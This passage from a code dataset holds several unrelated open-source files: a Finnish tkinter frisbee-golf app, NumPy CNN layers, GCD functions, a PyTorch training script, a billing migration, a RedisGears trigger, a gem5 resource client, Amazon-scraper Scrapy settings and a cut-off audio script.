x[0])\n connection.close()\n return radat\n\ndef lisaa_pelaaja():\n \n def pelaajalisays():\n query = '''\n INSERT INTO Players\n (FirstName, LastName, Handicap)\n VALUES (?, ?, ?);\n '''\n tiedot = (fn_entry.get(), ln_entry.get(), int(hc_entry.get()),)\n print(\"lisäysvaluet\", tiedot)\n connection = sqlite3.connect(\"friba.db\")\n cursor = connection.cursor()\n cursor.execute(query, tiedot)\n connection.commit()\n connection.close()\n \n\n lisaa_otsikko = tk.Label(contentwindow, text=\"Uusi Pelaaja:\", bg=bgcolor, fg=\"white\")\n lisaa_otsikko.pack(side=\"top\")\n\n fn_text = tk.Label(contentwindow, text=\"Etunimi\", bg=bgcolor, fg=\"white\")\n fn_entry = Entry(contentwindow, width=25)\n\n ln_text = tk.Label(contentwindow, text=\"Sukunimi\", bg=bgcolor, fg=\"white\")\n ln_entry = Entry(contentwindow, width=25)\n \n hc_text = tk.Label(contentwindow, text=\"Handicap\", bg=bgcolor, fg=\"white\")\n hc_entry = Entry(contentwindow, width=25)\n\n fn_text.pack(side=\"left\")\n fn_entry.pack(side=\"left\")\n\n ln_text.pack(side=\"left\")\n ln_entry.pack(side=\"left\")\n\n hc_text.pack(side=\"left\")\n hc_entry.pack(side=\"left\")\n \n\n vahvista = tk.Button(\n contentwindow,\n text=\"lisää Pelaaja\",\n command=pelaajalisays,\n )\n vahvista.pack(side='top', padx=5)\n\n \n\n#pääframe \ndef lataa_mainwindow():\n\n #prevent child modifying parent\n mainwindow.pack_propagate(False)\n\n #logo\n logo_img = ImageTk.PhotoImage(file=\"logo.png\")\n logo_widget = tk.Label(mainwindow, image=logo_img, bg=bgcolor)\n 
logo_widget.image = logo_img\n logo_widget.pack(pady=20)\n\n #Otsikko\n tk.Label(\n mainwindow,\n text = \"Frisbeegolf Turnaukset\",\n bg = bgcolor,\n fg = \"white\",\n font = (\"Consolas\", 20)\n ).pack()\n\n #nappula1\n valikko_fontti = font.Font(family='Consolas', size=12)\n nykvalinta = StringVar()\n nykvalinta.set(\"Valitse turnaus\")\n turnausvalinnat = OptionMenu(\n mainwindow,\n nykvalinta,\n *kaikki_turnaukset,\n command=lataa_contentwindow\n )\n turnausvalinnat['font'] = valikko_fontti\n turnausvalinnat.pack(pady=5)\n\n teksti = tk.Label(\n mainwindow,\n text=\"kaikki:\",\n bg = bgcolor,\n fg = \"white\",\n font = (\"Consolas\", 15, 'bold')\n )\n teksti.place(x=50, y=140)\n\n nappi_fontti = font.Font(family='Consolas', size=10)\n #nappula2 \n pelaajat = Button(\n mainwindow,\n text = \"Pelaajat\",\n command=lataa_pelaajawindow\n )\n pelaajat['font'] = nappi_fontti\n pelaajat.place(x=55,y=165)\n\n #nappula3\n radat = Button(\n mainwindow,\n text = \"Radat\",\n command=lataa_ratawindow\n )\n radat['font'] = nappi_fontti\n radat.place(x=55,y=195)\n\ndef tyhjenna_tiedot(kentta):\n for data in kentta.winfo_children():\n data.destroy()\n\ndef lataa_contentwindow(valinta):\n tyhjenna_tiedot(contentwindow)\n tulostus_data = ttk.Treeview(contentwindow)\n #kentät\n tulostus_data['columns'] = (\"pvm\", \"Etunimi\", \"Sukunimi\", \"Pisteet\")\n #format columns, anchor=W(west,vasen reuna)\n tulostus_data.column(\"#0\", width = 0, stretch=NO)\n tulostus_data.column(\"pvm\", anchor=W, width = 120)\n tulostus_data.column(\"Etunimi\", anchor=W, width = 120)\n tulostus_data.column(\"Sukunimi\", anchor=W, width = 120)\n tulostus_data.column(\"Pisteet\", anchor=CENTER, width = 120)\n #Otsikot\n tulostus_data.heading(\"#0\", text=\"\", anchor=W)\n tulostus_data.heading(\"pvm\", text=\"Päivämäärä\", anchor=W)\n tulostus_data.heading(\"Etunimi\", text=\"Etunimi\", anchor=W)\n tulostus_data.heading(\"Sukunimi\", text=\"Sukunimi\", anchor=W)\n tulostus_data.heading(\"Pisteet\", text=\"Pisteet\", anchor=CENTER)\n\n #lisää tiedot\n tiedot = hae_turnaustiedot(valinta)\n idx = 0\n for tieto in tiedot: \n tulostus_data.insert(parent='', index='end', iid=idx, text=\"\", values=(tieto[0], tieto[3], tieto[4], tieto[5]))\n idx += 1\n radan_fontti = font.Font(family='Consolas', size=15, weight='bold')\n radan_nimi = tk.Label(\n contentwindow,\n text = f\"Rata: {str(tieto[1])}\\n Väyliä: {tieto[2]}\",\n bg = bgcolor,\n fg = \"white\"\n )\n radan_nimi['font'] = radan_fontti\n radan_nimi.pack()\n tulostus_data.pack()\n\ndef lataa_pelaajawindow():\n tyhjenna_tiedot(contentwindow)\n pelaajat_data = ttk.Treeview(contentwindow)\n #kentät\n pelaajat_data['columns'] = (\"Playerid\", \"Etunimi\", \"Sukunimi\", \"Handicap\")\n pelaajat_data.column(\"#0\", width = 0, stretch=NO)\n pelaajat_data.column(\"Playerid\", anchor=W, width = 120)\n pelaajat_data.column(\"Etunimi\", anchor=W, width = 120)\n pelaajat_data.column(\"Sukunimi\", anchor=W, width = 120)\n pelaajat_data.column(\"Handicap\", anchor=W, width = 120)\n \n #Otsikot\n pelaajat_data.heading(\"#0\", text=\"\", anchor=W)\n pelaajat_data.heading(\"Playerid\", text=\"Pelaajatunnus\", anchor=W)\n pelaajat_data.heading(\"Etunimi\", text=\"Etunimi\", anchor=W)\n pelaajat_data.heading(\"Sukunimi\", text=\"Sukunimi\", anchor=W)\n pelaajat_data.heading(\"Handicap\", text=\"Handicap\", anchor=W)\n \n tiedot = hae_pelaajat()\n idx = 0\n for tieto in tiedot: \n pelaajat_data.insert(parent='', index='end', iid=idx, text=\"\", values=(tieto[0], tieto[1], tieto[2], tieto[3]))\n idx 
+= 1\n pelaajat_data.pack(pady=5)\n\n lisaa_pelaaja()\n\n\ndef lataa_ratawindow():\n tyhjenna_tiedot(contentwindow)\n radat_data = ttk.Treeview(contentwindow)\n #kentät\n radat_data['columns'] = (\"Ratatunnus\", \"Nimi\", \"HoleCount\", \"CoursePar\", \"CourseRating\", \"BogeyRating\", \"SlopeRating\" )\n radat_data.column(\"#0\", width = 0, stretch=NO)\n radat_data.column(\"Ratatunnus\", anchor=W, width = 120)\n radat_data.column(\"Nimi\", anchor=W, width = 120)\n radat_data.column(\"HoleCount\", anchor=W, width = 120)\n radat_data.column(\"CoursePar\", anchor=W, width = 120)\n radat_data.column(\"CourseRating\", anchor=W, width = 120)\n radat_data.column(\"BogeyRating\", anchor=W, width = 120)\n radat_data.column(\"SlopeRating\", anchor=W, width = 120)\n\n radat_data.heading(\"#0\", text=\"\", anchor=W)\n radat_data.heading(\"Ratatunnus\", text=\"Ratatunnus\", anchor=W)\n radat_data.heading(\"Nimi\", text=\"Nimi\", anchor=W)\n radat_data.heading(\"HoleCount\", text=\"Väyliä\", anchor=W)\n radat_data.heading(\"CoursePar\", text=\"Par\",anchor=W)\n radat_data.heading(\"CourseRating\", text=\"Rata-Rating\", anchor=W)\n radat_data.heading(\"BogeyRating\", text=\"Bogey-Rating\", anchor=W)\n radat_data.heading(\"SlopeRating\", text=\"Slope-Rating\", anchor=W)\n\n radat = hae_radat()\n idx = 0\n for tieto in radat: \n radat_data.insert(parent='', index='end', iid=idx, text=\"\", values=(tieto[0],tieto[1],tieto[2],tieto[3],tieto[4],tieto[5],tieto[6]))\n idx += 1\n radat_data.pack()\n\n \n\n\n#init app\napp = tk.Tk()\n#title\napp.title(\"Turnaussovellus\")\n#center app window (tcl - tkinter :: windowmethod . top level, center)\napp.eval(\"tk::PlaceWindow . center\")\n#deny resize\napp.resizable(False,False)\n#turnaukset\nkaikki_turnaukset = hae_turnaus()\nkaikki_turnaukset = [\"\".join(ele) for ele in kaikki_turnaukset]\n#pelaajat\nkaikki_pelaajat = hae_pelaajat()\n\n\n#frames (appname,leveys,korkeus,tausta)\nmainwindow = tk.Frame(app, width=900, height=700, bg=bgcolor)\ncontentwindow = tk.Frame(app, bg=bgcolor)\nlisayswindow = tk.Frame(app, bg=bgcolor)\n\nmainwindow.grid(row=0, column=0)\ncontentwindow.grid(row=0, column=0)\nlisayswindow.grid(row=1,column=0)\n\n\n#header content\nlataa_mainwindow()\n#mainloop\napp.mainloop()","repo_name":"JoniObradovic/Frisbeegolf-Portaali","sub_path":"friba_ui.py","file_name":"friba_ui.py","file_ext":"py","file_size_in_byte":9650,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14118668803","text":"import numpy as np\n\n\n# 全连接层前向传播\ndef fc_forward(w, x, b):\n return np.dot(w, x) + b\n\n\ndef fc_backward(next_dz, W, z):\n \"\"\"\n 全连接层的反向传播\n :param next_dz: 下一层的梯度\n :param W: 当前层的权重\n :param z: 当前层的输出\n :return:\n \"\"\"\n N = z.shape[1]\n dz = np.dot(next_dz.T, W) # 当前层的梯度\n dw = np.dot(z, next_dz.T).T # 当前层权重的梯度\n db = np.sum(next_dz, axis=1, keepdims=True) # 当前层偏置的梯度, N个样本的梯度求和\n return dw / N, db / N, dz\n\n\ndef _conv_forward(z, K, b, padding=(0, 0)):\n \"\"\"\n 多通道卷积前向过程\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param K: 卷积核,形状(C,D,k1,k2), C为输入通道数,D为输出通道数\n :param b: 偏置,形状(D,)\n :param padding: padding\n :return: conv_z: 卷积结果[N,D,oH,oW]\n \"\"\"\n padding_z = np.lib.pad(z, ((0, 0), (0, 0), (padding[0], padding[0]), (padding[1], padding[1])), 'constant',\n constant_values=0)\n N, _, height, width = padding_z.shape\n C, D, k1, k2 = K.shape\n oh, ow = (1 + (height - k1), 1 + (width - k2)) # 输出的高度和宽度\n\n # 扩维\n padding_z = padding_z[:, :, np.newaxis, :, :] # 扩维[N,C,1,H,W] 与K [C,D,K1,K2] 
可以广播\n conv_z = np.zeros((N, D, oh, ow))\n\n # 批量卷积\n if k1 * k2 < oh * ow * 10:\n K = K[:, :, :, :, np.newaxis, np.newaxis]\n for c in range(C):\n for i in range(k1):\n for j in range(k2):\n # [N,1,oh,ow]*[D,1,1] =>[N,D,oh,ow]\n conv_z += padding_z[:, c, :, i:i + oh, j:j + ow] * K[c, :, i, j]\n else: # 大卷积核,遍历空间更高效\n # print('大卷积核,遍历空间更高效')\n for c in range(C):\n for h in range(oh):\n for w in range(ow):\n # [N,1,k1,k2]*[D,k1,k2] =>[N,D,k1,k2] => [N,D]\n conv_z[:, :, h, w] += np.sum(padding_z[:, c, :, h:h + k1, w:w + k2] * K[c], axis=(2, 3))\n\n # 增加偏置 [N, D, oh, ow]+[D, 1, 1]\n conv_z += b[:, np.newaxis, np.newaxis]\n return conv_z\n\n\ndef conv_forward(z, K, b, padding=(0, 0), strides=(1, 1)):\n \"\"\"\n 多通道卷积前向过程\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param K: 卷积核,形状(C,D,k1,k2), C为输入通道数,D为输出通道数\n :param b: 偏置,形状(D,)\n :param padding: padding\n :param strides: 步长\n :return: conv_z: 卷积结果[N,D,oH,oW]\n oH = (H+2padding-k1)/strides+1\n oW = (W+2padding-k2)/strides+1\n \"\"\"\n # 长宽方向步长\n sh, sw = strides\n origin_conv_z = _conv_forward(z, K, b, padding)\n # origin_conv_z = c_conv_forward(z, K, b, padding) # 使用cython\n # 步长为1时的���出卷积尺寸\n N, D, oh, ow = origin_conv_z.shape\n if sh * sw == 1:\n return origin_conv_z\n # 高度方向步长大于1\n elif sw == 1:\n conv_z = np.zeros((N, D, oh // sh, ow))\n for i in range(oh // sh):\n conv_z[:, :, i, :] = origin_conv_z[:, :, i * sh, :]\n return conv_z\n # 宽度方向步长大于1\n elif sh == 1:\n conv_z = np.zeros((N, D, oh, ow // sw))\n for j in range(ow // sw):\n conv_z[:, :, :, j] = origin_conv_z[:, :, :, j * sw]\n return conv_z\n # 高度宽度方向步长都大于1\n else:\n conv_z = np.zeros((N, D, oh // sh, ow // sw))\n for i in range(oh // sh):\n for j in range(ow // sw):\n conv_z[:, :, i, j] = origin_conv_z[:, :, i * sh, j * sw]\n return conv_z\n\n\ndef _insert_zeros(dz, strides):\n \"\"\"\n 想多维数组最后两位,每个行列之间增加指定的个数的零填充\n :param dz: (N,D,H,W),H,W为卷积输出层的高度和宽度\n :param strides: 步长\n :return:\n \"\"\"\n _, _, H, W = dz.shape\n pz = dz\n if strides[0] > 1:\n for h in np.arange(H - 1, 0, -1):\n for o in np.arange(strides[0] - 1):\n pz = np.insert(pz, h, 0, axis=2)\n if strides[1] > 1:\n for w in np.arange(W - 1, 0, -1):\n for o in np.arange(strides[1] - 1):\n pz = np.insert(pz, w, 0, axis=3)\n return pz\n\n\ndef _remove_padding(z, padding):\n \"\"\"\n 移除padding\n :param z: (N,C,H,W)\n :param paddings: (p1,p2)\n :return:\n \"\"\"\n if padding[0] > 0 and padding[1] > 0:\n return z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]\n elif padding[0] > 0:\n return z[:, :, padding[0]:-padding[0], :]\n elif padding[1] > 0:\n return z[:, :, :, padding[1]:-padding[1]]\n else:\n return z\n\n\ndef conv_backward(next_dz, K, z, padding=(0, 0), strides=(1, 1)):\n \"\"\"\n 多通道卷积层的反向过程\n :param next_dz: 卷积输出层的梯度,(N,D,H,W),H,W为卷积输出层的高度和宽度\n :param K: 当前层卷积核,(C,D,k1,k2)\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param padding: padding\n :param strides: 步长\n :return:\n \"\"\"\n N, C, H, W = z.shape\n C, D, k1, k2 = K.shape\n\n # 卷积核梯度\n # dK = np.zeros((C, D, k1, k2))\n padding_next_dz = _insert_zeros(next_dz, strides)\n\n # 卷积核高度和宽度翻转180度\n flip_K = np.flip(K, (2, 3))\n # 交换C,D为D,C;D变为输入通道数了,C变为输出通道数了\n swap_flip_K = np.swapaxes(flip_K, 0, 1)\n # 增加高度和宽度0填充\n ppadding_next_dz = np.lib.pad(padding_next_dz, ((0, 0), (0, 0), (k1 - 1, k1 - 1), (k2 - 1, k2 - 1)), 'constant',\n constant_values=0)\n dz = conv_forward(ppadding_next_dz,\n swap_flip_K,\n np.zeros((C,), dtype=np.float))\n\n # 求卷积和的梯度dK\n swap_z = np.swapaxes(z, 0, 1) # 变为(C,N,H,W)与\n dK = conv_forward(swap_z, padding_next_dz, 
np.zeros((D,), dtype=np.float))\n\n # 偏置的梯度,[N,D,H,W]=>[D]\n db = np.sum(next_dz, axis=(0, 2, 3)) # 在高度、宽度上相加;批量大小上相加\n\n # 把padding减掉\n dz = _remove_padding(dz, padding) # dz[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]\n\n return dK / N, db / N, dz\n\n\ndef max_pooling_forward(z, pooling, strides=(2, 2), padding=(0, 0)):\n \"\"\"\n 最大池化前向过程\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param pooling: 池化大小(k1,k2)\n :param strides: 步长\n :param padding: 0填充\n :return:\n \"\"\"\n N, C, H, W = z.shape\n pad_h, pad_w = padding\n sh, sw = strides\n kh, kw = pooling\n # 零填充\n padding_z = np.lib.pad(z, ((0, 0), (0, 0), (pad_h, pad_h), (pad_w, pad_w)), 'constant',\n constant_values=0)\n\n # 输出的高度和宽度\n out_h = (H + 2 * pad_h - kh) // sh + 1\n out_w = (W + 2 * pad_w - kw) // sw + 1\n\n pool_z = np.zeros((N, C, out_h, out_w), dtype=np.float)\n\n for i in np.arange(out_h):\n for j in np.arange(out_w):\n pool_z[:, :, i, j] = np.max(padding_z[:, :, sh * i:sh * i + kh, sw * j:sw * j + kw],\n axis=(2, 3))\n return pool_z\n\n\ndef max_pooling_backward(next_dz, z, pooling, strides=(2, 2), padding=(0, 0)):\n \"\"\"\n 最大池化反向过程\n :param next_dz:损失函数关于最大池化输出的损失\n :param z: 卷积层矩阵,形状(N,C,H,W),N为batch_size,C为通道数\n :param pooling: 池化大小(k1,k2)\n :param strides: 步长\n :param padding: 0填充\n :return:\n \"\"\"\n N, C, H, W = z.shape\n pad_h, pad_w = padding\n sh, sw = strides\n kh, kw = pooling\n _, _, out_h, out_w = next_dz.shape\n # 零填充\n padding_z = np.lib.pad(z, ((0, 0), (0, 0), (pad_h, pad_h), (pad_w, pad_w)), 'constant',\n constant_values=0)\n # 零填充后的梯度\n padding_dz = np.zeros_like(padding_z)\n zeros = np.zeros((N, C, sh, sw))\n for i in np.arange(out_h):\n for j in np.arange(out_w):\n # 找到最大值的那个元素坐标,将梯度传给这个坐标\n cur_padding_z = padding_z[:, :, sh * i:sh * i + kh, sw * j:sw * j + kw]\n cur_padding_dz = padding_dz[:, :, sh * i:sh * i + kh, sw * j:sw * j + kw]\n max_val = np.max(cur_padding_z, axis=(2, 3)) # [N,C]\n cur_padding_dz += np.where(cur_padding_z == max_val[:, :, np.newaxis, np.newaxis],\n next_dz[:, :, i:i + 1, j:j + 1],\n zeros)\n # 返回时剔除零填充\n return _remove_padding(padding_dz, padding) # padding_z[:, :, padding[0]:-padding[0], padding[1]:-padding[1]]\n\n","repo_name":"mofengboy/fcn-base-numpy","sub_path":"layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5768941007","text":"class Solution:\n def naive_approach(self, num1: int, num2: int) -> int:\n min_value = min(num1, num2)\n while min_value > 0:\n if num1 % min_value == 0 and num2 % min_value == 0:\n break\n min_value -= 1\n return min_value\n\n def euclidean_approach(self, num1: int, num2: int) -> int:\n while num1 != num2:\n if num1 > num2:\n num1 -= num2\n else:\n num2 -= num1\n\n return num1\n\n def optimized_euclidean_approach(self, num1: int, num2: int) -> int:\n if num2 == 0:\n return num1\n return self.optimized_euclidean_approach(num2, num1 % num2)\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.naive_approach(12, 6))\n print(s.euclidean_approach(12, 6))\n print(s.optimized_euclidean_approach(12, 6))","repo_name":"SanjampreetSingh/YouTube-CodeSanjam","sub_path":"Maths/02. Greatest Common Divisor.py","file_name":"02. 
Greatest Common Divisor.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24905235241","text":"'''Train CIFAR10 with PyTorch.'''\nimport torch\nimport torch.optim as optim\nimport numpy as np\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport time\n\nfrom model import get_model\nfrom data import get_data, make_planeloader\nfrom utils import get_loss_function, get_scheduler, get_random_images, get_noisy_images, AttackPGD\nfrom evaluation import train, test, decision_boundary, test_on_adv\nfrom options import options\nfrom utils import simple_lapsed_time\n\nargs = options().parse_args()\nprint(args)\nroot_path = '../'\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nsave_path = args.save_net\nif args.active_log:\n import wandb\n idt = '_'.join(list(map(str,args.imgs)))\n wandb.init(project=\"Train_models\", name = str(args.net) )\n wandb.config.update(args)\n\n# Data/other training stuff\ntorch.manual_seed(args.set_data_seed)\ntrainloader, testloader = get_data(args)\ntorch.manual_seed(args.set_seed)\ntrain_loss = []\ntest_accs = []\ntrain_accs = []\nnet = get_model(args, device)\n\ntest_acc, predicted = test(args, net, testloader, device, 0)\nprint(\"scratch prediction \", test_acc)\n\ncriterion = get_loss_function(args)\nif args.opt == 'SGD':\n optimizer = optim.SGD(net.parameters(), lr=args.lr,\n momentum=0.9, weight_decay=5e-4)\n scheduler = get_scheduler(args, optimizer)\n\nelif args.opt == 'Adam':\n optimizer = torch.optim.Adam(net.parameters(), lr=args.lr)\n\n\n\n# Train or load base network\nprint(\"Training the network or loading the network\")\n\nstart = time.time()\nbest_acc = 0 # best test accuracy\nbest_epoch = 0\nif args.load_net is None:\n for epoch in range(args.epochs):\n train_acc, train_loss = train(args, net, trainloader, optimizer, criterion, device, args.train_mode, sam_radius=args.sam_radius)\n test_acc, predicted = test(args, net, testloader, device, epoch)\n print(f'EPOCH:{epoch}, Test acc: {test_acc}, Train_acc: {train_acc}, Train_loss: {train_loss}')\n if args.active_log:\n wandb.log({'epoch': epoch ,'test_accuracy': test_acc,\n 'train_acc': train_acc, 'train_loss': train_loss})\n if args.dryrun:\n break\n if args.opt == 'SGD':\n scheduler.step()\n\n # Save checkpoint.\n if test_acc > best_acc:\n print(f'The best epoch is: {epoch}')\n os.makedirs(f'{root_path}/ckp/{args.baseset}', exist_ok=True)\n \n print(f'{root_path}/ckp/{args.baseset}/{str(args.net)}.pth')\n if torch.cuda.device_count() > 1:\n torch.save(net.module.state_dict(),\n f'{root_path}/ckp/{args.baseset}/{str(args.net)}.pth')\n else:\n torch.save(net.state_dict(),\n f'{root_path}/ckp/{args.baseset}/{str(args.net)}.pth')\n best_acc = test_acc\n best_epoch = epoch\nelse:\n net.load_state_dict(torch.load(args.load_net))\n \n\nif args.load_net is None and args.active_log:\n wandb.log({'best_epoch': epoch ,'best_test_accuracy': best_acc\n })\n# test_acc, predicted = test(args, net, testloader, device)\n# print(test_acc)\n\nend = time.time()\nsimple_lapsed_time(\"Time taken to train/load the model\", end-start)\n\nif not args.plot_animation:\n start = time.time()\n if args.imgs is None:\n #images, labels = get_random_images(trainloader.dataset)\n images, labels, image_ids = get_random_images(testloader.dataset)\n else:\n # import ipdb; ipdb.set_trace()\n image_ids = args.imgs\n images = [trainloader.dataset[i][0] for i in image_ids]\n labels = 
[trainloader.dataset[i][1] for i in image_ids]\n print(labels)\n # image_ids = args.imgs\n sampleids = '_'.join(list(map(str,image_ids)))\n # sampleids = '_'.join(list(map(str,labels)))\n planeloader = make_planeloader(images, args)\n preds = decision_boundary(args, net, planeloader, device)\n from utils import produce_plot_alt,produce_plot_sepleg\n\n net_name = args.net\n plot_path = f'{root_path}/images/{net_name}/{str(args.baseset)}/{sampleids}'\n os.makedirs(plot_path, exist_ok=True)\n produce_plot_sepleg(plot_path, preds, planeloader, images, labels, trainloader, args.baseset, title = 'best', temp=1.0,true_labels = None)\n produce_plot_alt(plot_path, preds, planeloader, images, labels, trainloader)\n\n end = time.time()\n simple_lapsed_time(\"Time taken to plot the image\", end-start)","repo_name":"jmkill1/thesis-code","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5755407756","text":"import logging\nfrom brokerage.brokerage_model import MatrixFormat\nfrom upgrade_scripts import alembic_upgrade\nfrom reebill.reebill_model import ReeBillCustomer, ReeBill\nfrom sqlalchemy import desc\nfrom core.model import Session, Base, Address\nfrom core import init_model\n\nlog = logging.getLogger(__name__)\n\ndef update_reebill_customer_addresses():\n s = Session()\n customers = s.query(ReeBillCustomer).all()\n address = Address()\n for customer in customers:\n reebill = s.query(ReeBill).filter(ReeBill.reebill_customer==customer).order_by(desc(ReeBill.sequence)).first()\n if reebill is not None:\n customer.service_address = reebill.service_address\n customer.billing_address = reebill.billing_address\n else:\n customer.service_address = address\n customer.billing_address = address\n\ndef upgrade():\n alembic_upgrade('4f589e8d4cab')\n\n init_model(schema_revision='4f589e8d4cab')\n Base.metadata.reflect()\n s = Session()\n\n # create MatrixFormat objects, which now contain the\n # matrix_attachment_name column.\n # the Supplier.matrix_attachment_name attribute removed but the\n # supplier.matrix_attachement_name column still exists in the database. 
i\n # couldn't figure out the fancy SQLAlchemy way to add such a hidden\n # column to the query, so:\n cur = s.execute(\"select name, id, matrix_attachment_name from supplier \"\n \"where matrix_email_recipient is not null\")\n for name, supplier_id, matrix_attachment_name in cur.fetchall():\n s.add(MatrixFormat(name=name, supplier_id=supplier_id,\n matrix_attachment_name=matrix_attachment_name))\n log.info('Created MatrixFormat for supplier %s \"%s\"' % (\n supplier_id, name))\n alembic_upgrade('5999376fe57d')\n #init_model(schema_revision='5999376fe57d')\n update_reebill_customer_addresses()\n s.commit()\n alembic_upgrade('2d5527ff438a')\n init_model(schema_revision='2d5527ff438a')\n s.commit()\n","repo_name":"razagilani/billing","sub_path":"upgrade_scripts/v37/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39653566426","text":"def reScore(x):\n rescorecount = 0\n items=execute(\"FT.SEARCH\", \"ShoppingCart\", \"@session:{}\".format(x[1].replace(\"-\", \"\")))\n for item in items[2::2]:\n res_dct = {item[i]: item[i + 1] for i in range(0, len(item), 2)}\n res_dct['user'] = x[2]\n res_dct[\"action\"] = \"enhance\"\n newmsg = ['XADD', 'CHECK-IDENTITY', '*']\n [newmsg.extend([k,v]) for k,v in res_dct.items()]\n execute(*newmsg)\n rescorecount += 1\n return('resubmitted: {} items'.format(rescorecount))\n\nbg = GB('CommandReader', desc=\"Trigger to rescore the cart\")\nbg.map(reScore)\nbg.register(trigger='rescore')\n","repo_name":"redis-field-engineering/demo-microservices-fraud","sub_path":"gears/rescore_cart.py","file_name":"rescore_cart.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"33662021757","text":"import json\nfrom pathlib import Path\nfrom urllib import request\nfrom typing import Optional, Dict, Union, Type, Tuple, List, Any\nfrom .abstract_client import AbstractClient\nfrom urllib.error import URLError\nfrom m5.util import warn\n\n\nclass JSONClient(AbstractClient):\n def __init__(self, path: str):\n \"\"\"\n Initializes a JSON client.\n :param path: The path to the Resource, either URL or local.\n \"\"\"\n self.path = path\n self.resources = []\n\n if Path(self.path).is_file():\n self.resources = json.load(open(self.path))\n elif not self._url_validator(self.path):\n raise Exception(\n f\"Resources location '{self.path}' is not a valid path or URL.\"\n )\n else:\n req = request.Request(self.path)\n try:\n response = request.urlopen(req)\n except URLError as e:\n raise Exception(\n f\"Unable to open Resources location '{self.path}': {e}\"\n )\n self.resources = json.loads(response.read().decode(\"utf-8\"))\n\n def get_resources_json(self) -> List[Dict[str, Any]]:\n \"\"\"Returns a JSON representation of the resources.\"\"\"\n return self.resources\n\n def get_resources(\n self,\n resource_id: Optional[str] = None,\n resource_version: Optional[str] = None,\n gem5_version: Optional[str] = None,\n ) -> List[Dict[str, Any]]:\n filter = self.resources # Unfiltered.\n if resource_id:\n filter = [ # Filter by resource_id.\n resource\n for resource in filter\n if resource[\"id\"] == resource_id\n ]\n if resource_version:\n filter = [ # Filter by resource_version.\n resource\n for resource in filter\n if resource[\"resource_version\"] == resource_version\n ]\n\n # Filter by gem5_version.\n return self.filter_incompatible_resources(\n 
resources_to_filter=filter, gem5_version=gem5_version\n )\n","repo_name":"gem5/gem5","sub_path":"src/python/gem5/resources/client_api/jsonclient.py","file_name":"jsonclient.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":1196,"dataset":"github-code","pt":"78"} +{"seq_id":"70998680251","text":"import scraper_helper as sh\r\n\r\nBOT_NAME = \"amazon\"\r\n\r\nSPIDER_MODULES = [\"amazon.spiders\"]\r\nNEWSPIDER_MODULE = \"amazon.spiders\"\r\n\r\n\r\n\r\nROBOTSTXT_OBEY = False\r\nAUTOTHROTTLE_ENABLED = True\r\n\r\n\r\n\r\nDEFAULT_REQUEST_HEADERS = sh.get_dict(\r\n\r\n'''\r\naccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\naccept-encoding: gzip, deflate, br\r\naccept-language: en-US,en;q=0.9\r\ncache-control: max-age=0\r\ncookie: session-id=260-5874485-2760255; i18n-prefs=EUR; lc-acbde=en_GB; ubid-acbde=257-6233833-2244109; session-id-time=2082787201l; sp-cdn=\"L5Z9:PK\"; session-token=JawI4Csh+Bb+eaIJfj0pL6AXmYwQ2WTm0s+ilcPlrp58lEQOQVxOby59cE0shPCvMiDrCUW/HhWAm7DTbSq6DjgtPkuRCM51JPWu89+4q1pKKMSmxqPMSjB24UYKM/pxpbfAAPE5qlEVPixO6cVYUJ/+MPBveDXfgMWtvZDYxCNGFI24doRY/citS4XQttraP2BCOFa+KDVf4rSrM6IsbwbNaVdUEdn80KgWqg7y1sE=; csm-hit=adb:adblk_yes&t:1676301979710&tb:RM95JDX1D6BMJ5VVB64K+s-FQANRVR2GZFDSBAX1HBN|1676301979710\r\ndevice-memory: 8\r\ndownlink: 1.45\r\ndpr: 1\r\nect: 3g\r\nrtt: 300\r\nsec-ch-device-memory: 8\r\nsec-ch-dpr: 1\r\nsec-ch-ua: \"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: \"Windows\"\r\nsec-ch-ua-platform-version: \"10.0.0\"\r\nsec-ch-viewport-width: 653\r\nsec-fetch-dest: document\r\nsec-fetch-mode: navigate\r\nsec-fetch-site: same-origin\r\nsec-fetch-user: ?1\r\nupgrade-insecure-requests: 1\r\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nviewport-width: 653\r\n'''\r\n)\r\n\r\n","repo_name":"zayn-hub/Amazon_reviews","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21972944316","text":"import soundfile as sf\r\nimport sounddevice as sd\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport math\r\nfrom signalTeste import *\r\n\r\nfilename = \"terror.wav\"\r\n\r\nsinal = Signal()\r\n\r\n#sound, fs = sf.read(filename)\r\nfs = 44100\r\ntime0 = 